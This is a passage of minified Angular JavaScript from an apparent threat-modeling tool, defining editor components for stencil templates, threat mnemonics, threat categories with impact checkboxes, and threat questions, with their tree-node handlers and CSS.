Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);Re.splice(Fe,0,Re.splice(Fe-1,1)[0]),te.children.splice(Fe,0,te.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=this.dataService.Config.GetStencilTypeTemplates();if(Re.findIndex(Fe=>Fe.ID==Y.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);Re.splice(Fe,0,Re.splice(Fe+1,1)[0]),te.children.splice(Fe,0,te.children.splice(Fe+1,1)[0])}}};return pe};this.dataService.Config.GetStencilTypeTemplates().forEach(Y=>d.children.push(T(Y,d))),this.Nodes.push(d);let k={name:()=>"Mnemonic",canSelect:!1,icon:"abc",canAdd:!0,onAdd:()=>{let Y=this.dataService.Config.CreateStencilThreatMnemonic();this.createNodes(),this.selectedNode=this.FindNodeOfObject(Y),this.selectedNode.isRenaming=!0},children:[]},q=(Y,te)=>{let pe={name:()=>Y.Name,canSelect:!0,data:Y,canRename:!0,onRename:Re=>pe.data.Name=Re,canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(Y).subscribe(Re=>{Re&&(this.dataService.Config.DeleteStencilThreatMnemonic(pe.data),pe==this.selectedNode&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let Re=this.dataService.Config.CreateStencilThreatMnemonic();Re.CopyFrom(Y.Data),Re.Name=Re.Name+"-Copy",this.createNodes(),this.selectedNode=this.FindNodeOfObject(Re),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Re=this.dataService.Config.GetStencilThreatMnemonics();if(0!=Re.findIndex(Fe=>Fe.ID==Y.ID)){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);Re.splice(Fe,0,Re.splice(Fe-1,1)[0]),te.children.splice(Fe,0,te.children.splice(Fe-1,1)[0])}},onMoveDown:()=>{let Re=this.dataService.Config.GetStencilThreatMnemonics();if(Re.findIndex(Fe=>Fe.ID==Y.ID)!=Re.length-1){let Fe=Re.findIndex(Ne=>Ne.ID==Y.ID);Re.splice(Fe,0,Re.splice(Fe+1,1)[0]),te.children.splice(Fe,0,te.children.splice(Fe+1,1)[0])}}};return pe};this.dataService.Config.GetStencilThreatMnemonics().forEach(Y=>k.children.push(q(Y,k))),this.Nodes.push(k),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-stencils"]],viewQuery:function(e,i){if(1&e&&Mi(Mut,5),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first)}},inputs:{selectedNode:"selectedNode"},features:[ci],decls:11,vars:6,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["ctxMenu","matMenuTrigger"],["rightMenu","matMenu"],["matMenuContent",""],[2,"margin-left","10px","margin-right","10px"],["appearance","fill","style","width: 100%;",4,"ngIf"],[3,"selectedIndex","selectedIndexChange",4,"ngIf"],[3,"selectedTypeTemplate",4,"ngIf"],[4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[3,"selectedIndex","selectedIndexChange"],[3,"label"],["matTabContent",""],[3,"label",4,"ngIf"],[1,"row"],[1,"column1"],["cdkDropList","",1,"prop-list","reorder-list",3,"cdkDropListDropped"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click","contextmenu",4,"ngFor","ngForOf"],[1,"column2"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click","contextmenu"],["mat-list-icon",""],["mat-line",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["style","margin-left: auto; margin-right: 5px",4,"ngIf"],[2,"margin-left","auto","margin-right","5px"],[2,"margin","10px"],["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],["matInput","","type","text",3,"spellcheck","ngModel","ngModelChange"],["color","primary",3,"ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"value"],[")","",4,"ngIf"],[")",""],["mat-raised-button","",3,"click"],[2,"margin-top","10px"],["appearance","fill","class","property-form-field",4,"ngIf"],["multiple","","matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],["cdkDrag","","matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[3,"node","threatRule","canEdit","canEditName"],["cdkDrag","","matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-line","",4,"ngIf"],[1,"prop-list","reorder-list"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"disabled","matTooltip","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip",4,"ngIf"],["matInput","",3,"spellcheck","ngModel","ngModelChange"],["matTooltipShowDelay","1000",3,"matTooltip"],[3,"selectedTypeTemplate"],["matInput","","type","text","matTooltip","selectedProperty.DisplayName","matTooltipShowDelay","1000",3,"spellcheck","ngModel","ngModelChange"],["style","padding-left: 60px;",4,"ngIf"],[2,"margin","10px 0 10px 10px"],[3,"value","valueChange"],[3,"label",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip",4,"ngFor","ngForOf"],["matTooltipShowDelay","1000",3,"value","matTooltip"],[2,"padding-left","60px"],[4,"ngFor","ngForOf"],["color","primary",3,"checked","change"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"click"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){if(1&e&&(ne(0,Oht,19,8,"div",0),s(1,"\n"),it(2,"div",1,2),s(4," \n"),m(5,"mat-menu",null,3),s(7," \n "),ne(8,zht,3,1,"ng-template",4),s(9," \n"),u(),s(10," ")),2&e){const n=Ti(6);F("ngIf",i.selectedNode),g(2),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),F("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,an,Ta,Ea,Sd,kd,oa,br,da,nn,un,jr,Nr,yr,gg,qh,Mu,Uh,Go,Xa,ts,is,Or,Lr,rc,pp,Xo,qo,po,el,Pa,qp,but,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%] .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%] .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%] .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.disable[_ngcontent-%COMP%]{pointer-events:none}']}),t})();function Fht(t,a){if(1&t){const e=Ye();m(0,"table",4),s(1,"\n "),m(2,"tr")(3,"td")(4,"mat-checkbox",5),he("change",function(){const r=be(e).$implicit,c=V();return Me(c.ImpactCatChanged(c.threatCat,r))}),s(5),oe(6,"translate"),u()()(),s(7,"\n "),u()}if(2&t){const e=a.$implicit,i=V();g(4),F("checked",i.threatCat.ImpactCats.includes(e)),g(1),ke(re(6,2,i.GetImpactCategoryName(e)))}}let Vht=(()=>{class t{constructor(e){this.dataService=e,this.canEdit=!0}ngOnInit(){}ImpactCatChanged(e,i){const n=e.ImpactCats.indexOf(i);n>=0?e.ImpactCats.splice(n,1):e.ImpactCats.push(i)}GetImpactCategories(){return Vs.GetKeys()}GetImpactCategoryName(e){return Vs.ToString(e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-category"]],inputs:{threatCat:"threatCat",canEdit:"canEdit"},decls:20,vars:11,consts:[["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[2,"margin-top","10px","display","flex","flex-wrap","wrap"],["style","min-width: 200px;",4,"ngFor","ngForOf"],[2,"min-width","200px"],["color","primary",3,"checked","change"]],template:function(e,i){1&e&&(m(0,"div"),s(1,"\n "),m(2,"mat-form-field",0),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"textarea",1),he("ngModelChange",function(r){return i.threatCat.Description=r}),u(),s(9,"\n "),u(),s(10,"\n "),m(11,"h3"),s(12),oe(13,"translate"),u(),s(14,"\n "),m(15,"div",2),s(16,"\n "),ne(17,Fht,8,4,"table",3),s(18,"\n "),u(),s(19,"\n"),u()),2&e&&(Ct("disable",!i.canEdit),g(5),ke(re(6,7,"properties.Description")),g(3),F("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.threatCat.Description),g(4),ke(re(13,9,"properties.ImpactCategories")),g(5),F("ngForOf",i.GetImpactCategories()))},dependencies:[Zi,an,Ta,Ea,br,nn,un,Go,Xa,Xi],styles:[".disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})();function Bht(t,a){if(1&t&&(m(0,"th",9),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(3);g(1),ke(re(2,1,i.GetImpactCategoryName(e)))}}function Hht(t,a){if(1&t){const e=Ye();m(0,"td",11)(1,"mat-checkbox",12),he("change",function(){const r=be(e).$implicit,c=V().$implicit;return Me(V(3).ImpactCatChanged(c,r))}),u()()}if(2&t){const e=a.$implicit,i=V().$implicit;g(1),F("checked",i.ImpactCats.includes(e))}}function Uht(t,a){if(1&t&&(m(0,"tr"),s(1,"\n "),m(2,"td"),s(3),u(),s(4,"\n "),ne(5,Hht,2,1,"td",10),s(6,"\n "),u()),2&t){const e=a.$implicit,i=V(3);g(3),ke(e.Name),g(2),F("ngForOf",i.GetImpactCategories())}}function qht(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-form-field",4),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"textarea",5),he("ngModelChange",function(n){return be(e),Me(V(2).selectedThreatCatGroup.Description=n)}),u(),s(9,"\n "),u(),s(10,"\n "),m(11,"table",6),s(12,"\n "),m(13,"tr"),s(14,"\n "),m(15,"th"),s(16),oe(17,"translate"),u(),s(18,"\n "),ne(19,Bht,3,3,"th",7),s(20,"\n "),u(),s(21,"\n "),ne(22,Uht,7,2,"tr",8),s(23,"\n "),u(),s(24,"\n "),Mt()}if(2&t){const e=V(2);g(5),ke(re(6,6,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedThreatCatGroup.Description),g(8),ke(re(17,8,"pages.config.ThreatCategory")),g(3),F("ngForOf",e.GetImpactCategories()),g(3),F("ngForOf",e.selectedThreatCatGroup.ThreatCategories)}}function Ght(t,a){1&t&&it(0,"app-threat-category",13),2&t&&F("threatCat",V(2).selectedThreatCat)}function jht(t,a){if(1&t&&(m(0,"div",1),s(1,"\n "),m(2,"h2"),s(3),u(),s(4,"\n "),ne(5,qht,25,10,"ng-container",2),s(6,"\n "),ne(7,Ght,1,1,"app-threat-category",3),s(8,"\n"),u()),2&t){const e=V();g(3),ke(e.selectedNode.name()),g(2),F("ngIf",e.selectedThreatCatGroup),g(2),F("ngIf",e.selectedThreatCat)}}let Qht=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r,i.ConfigChanged.subscribe(c=>this.createNodes())}get selectedThreatCatGroup(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Zb?this.selectedNode.data:null}get selectedThreatCat(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Jb?this.selectedNode.data:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}ImpactCatChanged(e,i){const n=e.ImpactCats.indexOf(i);n>=0?e.ImpactCats.splice(n,1):e.ImpactCats.push(i)}GetImpactCategories(){return Vs.GetKeys()}GetImpactCategoryName(e){return Vs.ToString(e)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(c,d,T,k)=>{let q={name:()=>c.Name,canSelect:!0,data:c,canRename:!0,onRename:Y=>{c.Name=Y},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(Y=>{Y&&(this.dataService.Config.DeleteThreatCategory(c),this.selectedNode==q&&(this.selectedNode=null),this.createNodes())})},canDuplicate:!0,onDuplicate:()=>{let Y=this.dataService.Config.CreateThreatCategory();Y.CopyFrom(c.Data),Y.Name=Y.Name+"-Copy",this.dataService.Config.GetThreatCategoryGroups().find(te=>te.ThreatCategories.includes(c)).AddThreatCategory(Y),this.createNodes(),this.selectedNode=this.FindNodeOfObject(Y),this.selectedNode.isRenaming=!0},canMoveUpDown:!0,onMoveUp:()=>{let Y=d.Data.threatCategorieIDs;if(0!=Y.findIndex(te=>te==c.ID)){let te=Y.findIndex(pe=>pe==c.ID);Y.splice(te,0,Y.splice(te-1,1)[0]),T.children.splice(te,0,T.children.splice(te-1,1)[0])}},onMoveDown:()=>{let Y=d.Data.threatCategorieIDs;if(Y.findIndex(te=>te==c.ID)!=Y.length-1){let te=Y.findIndex(pe=>pe==c.ID);Y.splice(te,0,Y.splice(te+1,1)[0]),T.children.splice(te,0,T.children.splice(te+1,1)[0])}},canMoveToGroup:!0,onMoveToGroups:()=>k.children.filter(Y=>Y!=T),onMoveToGroup:Y=>{let te="threatCategorieIDs";d.Data[te].splice(d.Data[te].indexOf(c.ID),1),Y.data.Data[te].push(c.ID),this.createNodes()}};return q},n=c=>{let d={name:()=>c.Name,canSelect:!0,data:c,canAdd:!0,onAdd:()=>{let T=this.dataService.Config.CreateThreatCategory();c.AddThreatCategory(T),this.createNodes(),this.selectedNode=this.FindNodeOfObject(T),this.selectedNode.isRenaming=!0},canRename:!0,onRename:T=>{c.Name=T},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(c).subscribe(T=>{T&&(this.dataService.Config.DeleteThreatCategoryGroup(c),this.selectedNode==d&&(this.selectedNode=null),this.createNodes())})},children:[],canMoveUpDown:!0,onMoveUp:()=>{let T=this.dataService.Config.GetThreatCategoryGroups();if(0!=T.findIndex(k=>k.ID==c.ID)){let k=T.findIndex(q=>q.ID==c.ID);T.splice(k,0,T.splice(k-1,1)[0]),r.children.splice(k,0,r.children.splice(k-1,1)[0])}},onMoveDown:()=>{let T=this.dataService.Config.GetThreatCategoryGroups();if(T.findIndex(k=>k.ID==c.ID)!=T.length-1){let k=T.findIndex(q=>q.ID==c.ID);T.splice(k,0,T.splice(k+1,1)[0]),r.children.splice(k,0,r.children.splice(k+1,1)[0])}}};return d},r={name:()=>this.translate.instant("pages.config.threatcategories.ThreatCategoryGroups"),canSelect:!1,canAdd:!0,hasMenu:!0,icon:"flash_on",onAdd:()=>{let c=this.dataService.Config.CreateThreatCategoryGroup();this.createNodes(),this.selectedNode=this.FindNodeOfObject(c),this.selectedNode.isRenaming=!0},children:[]};this.dataService.Config.GetThreatCategoryGroups().forEach(c=>{let d=n(c);c.ThreatCategories.forEach(T=>d.children.push(i(T,c,d,r))),r.children.push(d)}),this.Nodes.push(r),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-categories"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[4,"ngIf"],[3,"threatCat",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],[2,"margin-top","10px"],["style","padding: 0 3px 0 3px",4,"ngFor","ngForOf"],[4,"ngFor","ngForOf"],[2,"padding","0 3px 0 3px"],["style","text-align: center;",4,"ngFor","ngForOf"],[2,"text-align","center"],["color","primary",3,"checked","change"],[3,"threatCat"]],template:function(e,i){1&e&&ne(0,jht,9,3,"div",0),2&e&&F("ngIf",i.selectedNode)},dependencies:[Zi,Ri,an,Ta,Ea,br,nn,un,Go,Xa,Vht,Xi]}),t})();function $ht(t,a){if(1&t){const e=Ye();m(0,"button",14),he("click",function(){return be(e),Me(V().threatQuestion.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Kht(t,a){if(1&t&&(m(0,"mat-option",15),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(e.DisplayName)}}function Xht(t,a){if(1&t&&(m(0,"mat-option",15),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V();F("value",e),g(1),ke(re(2,2,i.GetOptionTypeName(e)))}}function Yht(t,a){if(1&t&&(m(0,"div",18),s(1),u()),2&t){const e=V().$implicit,i=V();g(1),ct("Property set to ",i.threatQuestion.ChangesPerOption[e.Key].Value,"")}}function Jht(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",16),he("click",function(){const r=be(e).$implicit;return Me(V().selectedOption=r)}),s(1,"\n "),m(2,"mat-icon",17),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",18),s(6),oe(7,"translate"),u(),s(8,"\n "),ne(9,Yht,2,1,"div",19),s(10,"\n "),u()}if(2&t){const e=a.$implicit,i=V();Ct("highlight-light",i.IsOptionSelected(e)&&!i.theme.IsDarkMode)("highlight-dark",i.IsOptionSelected(e)&&i.theme.IsDarkMode),g(2),ri("visibility",null!=i.threatQuestion.ChangesPerOption[e.Key]&&i.threatQuestion.ChangesPerOption[e.Key].Active?"visible":"hidden"),g(4),ke(re(7,8,e.Key)),g(3),F("ngIf",i.threatQuestion.Property&&1==(null==i.threatQuestion.ChangesPerOption[e.Key]?null:i.threatQuestion.ChangesPerOption[e.Key].Active))}}function Zht(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"mat-checkbox",20),he("ngModelChange",function(n){be(e);const r=V();return Me(r.threatQuestion.ChangesPerOption[r.selectedOption.Key].Active=n)}),s(3),oe(4,"translate"),u(),s(5,"\n "),it(6,"br"),s(7,"\n Set "),m(8,"i"),s(9),u(),s(10," to "),m(11,"mat-checkbox",21),he("ngModelChange",function(n){be(e);const r=V();return Me(r.threatQuestion.ChangesPerOption[r.selectedOption.Key].Value=n)}),u(),s(12,"\n "),Mt()}if(2&t){const e=V();g(2),F("ngModel",e.threatQuestion.ChangesPerOption[e.selectedOption.Key].Active),g(1),ke(re(4,5,"pages.config.threatquestion.setProperty")),g(6),ke(e.threatQuestion.Property.DisplayName),g(2),F("disabled",!(null!=e.threatQuestion.ChangesPerOption[e.selectedOption.Key]&&e.threatQuestion.ChangesPerOption[e.selectedOption.Key].Active))("ngModel",e.threatQuestion.ChangesPerOption[e.selectedOption.Key].Value)}}let TZ=(()=>{class t{constructor(e,i,n){this.theme=e,this.dataService=i,this.dialog=n,this.canEdit=!0,this.showAttackVector=!0}get threatQuestion(){return this._threatQuestion}set threatQuestion(e){this._threatQuestion=e,this.selectedOption=null}ngOnInit(){}GetProperties(){return this.threatQuestion.ComponentType.Properties}GetOptionTypes(){return Pl.GetTypes()}GetOptionTypeName(e){return Pl.ToString(e)}GetOptionValues(e){return Pl.GetOptions(e)}IsOptionSelected(e){return null!=this.selectedOption&&e.Key==this.selectedOption.Key}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-question"]],inputs:{canEdit:"canEdit",showAttackVector:"showAttackVector",threatQuestion:"threatQuestion"},decls:85,vars:44,consts:[["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltipShowDelay","1000",3,"spellcheck","ngModel","matTooltip","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["appearance","fill",2,"width","100%"],["matInput","","type","text",3,"spellcheck","ngModel","ngModelChange"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","2","cdkAutosizeMaxRows","5",3,"spellcheck","ngModel","ngModelChange"],["matTooltipShowDelay","1000",3,"value","matTooltip","valueChange"],[3,"value",4,"ngFor","ngForOf"],[1,"optionColumn1"],[1,"prop-list"],["mat-subheader",""],[3,"highlight-light","highlight-dark","click",4,"ngFor","ngForOf"],[1,"optionColumn2"],[4,"ngIf"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[3,"value"],[3,"click"],["mat-list-icon",""],["mat-line","",2,"pointer-events","initial"],["mat-line","","style","pointer-events: initial;",4,"ngIf"],["color","primary","labelPosition","before",3,"ngModel","ngModelChange"],["color","primary",3,"disabled","ngModel","ngModelChange"]],template:function(e,i){1&e&&(m(0,"div"),s(1,"\n "),m(2,"mat-form-field",0),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",1),he("ngModelChange",function(r){return i.threatQuestion.Name=r}),u(),s(9,"\n "),ne(10,$ht,6,3,"button",2),s(11,"\n "),u(),s(12,"\n "),it(13,"br"),s(14,"\n "),m(15,"mat-form-field",3),s(16,"\n "),m(17,"mat-label"),s(18),oe(19,"translate"),u(),s(20,"\n "),m(21,"input",4),he("ngModelChange",function(r){return i.threatQuestion.Question=r}),u(),s(22,"\n "),u(),s(23,"\n "),it(24,"br"),s(25,"\n "),m(26,"mat-form-field",3),s(27,"\n "),m(28,"mat-label"),s(29),oe(30,"translate"),u(),s(31,"\n "),m(32,"textarea",5),he("ngModelChange",function(r){return i.threatQuestion.Description=r}),u(),s(33,"\n "),u(),s(34,"\n "),it(35,"br"),s(36,"\n "),m(37,"mat-form-field",0),s(38,"\n "),m(39,"mat-label"),s(40),oe(41,"translate"),u(),s(42,"\n "),m(43,"mat-select",6),he("valueChange",function(r){return i.threatQuestion.Property=r}),oe(44,"translate"),s(45,"\n "),ne(46,Kht,2,2,"mat-option",7),s(47,"\n "),u(),s(48,"\n "),u(),s(49,"\n "),it(50,"br"),s(51,"\n "),m(52,"mat-form-field",0),s(53,"\n "),m(54,"mat-label"),s(55),oe(56,"translate"),u(),s(57,"\n "),m(58,"mat-select",6),he("valueChange",function(r){return i.threatQuestion.OptionType=r}),oe(59,"translate"),s(60,"\n "),ne(61,Xht,3,4,"mat-option",7),s(62,"\n "),u(),s(63,"\n "),u(),s(64,"\n "),m(65,"div"),s(66,"\n "),m(67,"div",8),s(68,"\n "),m(69,"mat-list",9),s(70,"\n "),m(71,"div",10),s(72),oe(73,"translate"),u(),s(74,"\n "),ne(75,Jht,11,10,"mat-list-item",11),s(76,"\n "),u(),s(77,"\n "),u(),s(78,"\n "),m(79,"div",12),s(80,"\n "),ne(81,Zht,13,7,"ng-container",13),s(82,"\n "),u(),s(83,"\n "),u(),s(84,"\n"),u()),2&e&&(Ct("disable",!i.canEdit),g(5),ke(re(6,28,"properties.QuestionName")),g(3),at("matTooltip",i.threatQuestion.Name),F("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.threatQuestion.Name),g(2),F("ngIf",i.threatQuestion.Name),g(8),ke(re(19,30,"properties.Question")),g(3),F("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.threatQuestion.Question),g(8),ke(re(30,32,"properties.Description")),g(3),F("spellcheck",i.dataService.HasSpellCheck)("ngModel",i.threatQuestion.Description),g(8),ke(re(41,34,"general.Property")),g(3),at("matTooltip",re(44,36,null==i.threatQuestion.Property?null:i.threatQuestion.Property.Tooltip)),F("value",i.threatQuestion.Property),g(3),F("ngForOf",i.GetProperties()),g(9),ke(re(56,38,"properties.OptionType")),g(3),at("matTooltip",re(59,40,i.GetOptionTypeName(i.threatQuestion.OptionType))),F("value",i.threatQuestion.OptionType),g(3),F("ngForOf",i.GetOptionTypes()),g(8),Ct("prop-list-light",!i.theme.IsDarkMode)("prop-list-dark",i.theme.IsDarkMode),g(3),ke(re(73,42,"properties.ChangesPerOption")),g(3),F("ngForOf",i.GetOptionValues(i.threatQuestion.OptionType)),g(6),F("ngIf",i.threatQuestion&&i.selectedOption&&i.threatQuestion.Property))},dependencies:[Zi,Ri,an,Ta,Ea,oa,br,da,nn,un,jr,Nr,yr,Go,Xa,ts,is,Or,Lr,rc,Pa,Xi],styles:['.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.prop-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%] .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%] .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.optionColumn1[_ngcontent-%COMP%]{float:left;width:300px}.optionColumn2[_ngcontent-%COMP%]{float:left;width:calc(100% - 310px);padding-left:10px}.disable[_ngcontent-%COMP%]{pointer-events:none}']}),t})();const eft=["ctxMenu"];function tft(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",21),he("click",function(){const r=be(e).$implicit;return Me(V(4).selectedProperty=r)})("contextmenu",function(n){const c=be(e).$implicit;return Me(V(4).OpenContextMenu(n,c))}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon",22),s(4,"arrow_right"),u(),s(5,"\n "),m(6,"div",23),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"div",23),s(11),u(),s(12,"\n "),m(13,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(4).DeleteProperty(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"delete"),u()(),s(17,"\n "),u()}if(2&t){const e=a.$implicit,i=V(4);Ct("highlight-light",i.selectedProperty===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedProperty===e&&i.theme.IsDarkMode),at("matTooltip",re(1,8,e.DisplayName)),g(7),ke(re(8,10,e.DisplayName)),g(4),ke(e.Type),g(2),at("matTooltip",re(14,12,"general.Delete"))}}function ift(t,a){if(1&t){const e=Ye();m(0,"button",32),he("click",function(){return be(e),Me(V(5).selectedProperty.DisplayName="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function aft(t,a){if(1&t&&(m(0,"mat-option",33),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ke(e)}}function nft(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"div",25),s(3,"\n "),m(4,"mat-form-field",26),s(5,"\n "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"input",27),he("ngModelChange",function(n){return be(e),Me(V(4).selectedProperty.DisplayName=n)}),u(),s(11,"\n "),ne(12,ift,6,3,"button",28),s(13,"\n "),u(),s(14,"\n "),it(15,"br"),s(16,"\n "),m(17,"mat-form-field",26),s(18,"\n "),m(19,"mat-label"),s(20),oe(21,"translate"),u(),s(22,"\n "),m(23,"mat-select",29),he("valueChange",function(n){return 